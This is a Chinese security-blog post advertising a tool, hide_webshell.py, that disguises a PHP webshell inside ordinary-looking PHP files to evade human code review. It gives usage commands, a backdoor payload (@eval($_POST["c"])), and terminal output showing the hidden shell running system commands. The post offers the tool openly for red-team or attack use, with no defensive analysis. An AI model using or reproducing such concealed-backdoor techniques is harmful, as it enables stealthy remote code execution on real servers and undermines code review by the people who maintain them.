webshell生成(绕过)工具 -- webshell-bypassed-human
2022-7-19 08:8:50 Author: 系统安全运维(查看原文) 阅读量:11 收藏

一、过人 webshell 的生成工具

» python hide_webshell.pyusage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]                        [--debug]                        phphide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

二、hide webshell

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

三、hide webshell pro

python hide_webshell.py normal_pro.php -pf payload.txt --pro

四、payload 示例

system("echo \"hacked by Tr0y :)\"");@eval($_POST["c"]);

五、完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]» cat payload.txtsystem("echo \"hacked by Tr0y :)\"");%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php[+] Hide webshell in normal mode [-] Get payload from payload.txt Payload is system("echo \"hacked by Tr0y :)\""); [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php[+] Hide webshell in pro mode [-] Get payload from payload.txt Payload is system("echo \"hacked by Tr0y :)\""); [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]» cat payload.txt@eval($_POST["c"]);%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'[+] Hide webshell in normal mode [-] Get payload from payload.txt Payload is @eval($_POST["c"]); [-] Get php code from normal.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'[+] Hide webshell in pro mode [-] Get payload from payload.txt Payload is @eval($_POST["c"]); [-] Get php code from normal_pro.php[!] Saved webshell as webshell_hidden.php[!] All done

Bye :)uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

六、下载地址

https:

好文推荐

工具|红队快速批量打点

实战 | App优惠劵无限领取漏洞挖掘记录

利用 EHole 进行红队快速批量打点

神兵利器 - presshell

渗透测试-Ngrok内网映射与穿透

分享 | 几种实战成功过的webshell免杀方式

推荐一款自动向hackerone发送漏洞报告的扫描器

李姐姐开源DNSLog工具eyes.sh

欢迎关注 系统安全运维


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247505379&idx=2&sn=3c9b183131bd2ddfa86328d96701fd4f&chksm=c3080693f47f8f85906936948f91ab299724cf464901069b2eae52183bdf278948f1be16d30a#rd
如有侵权请联系:admin#unsafe.sh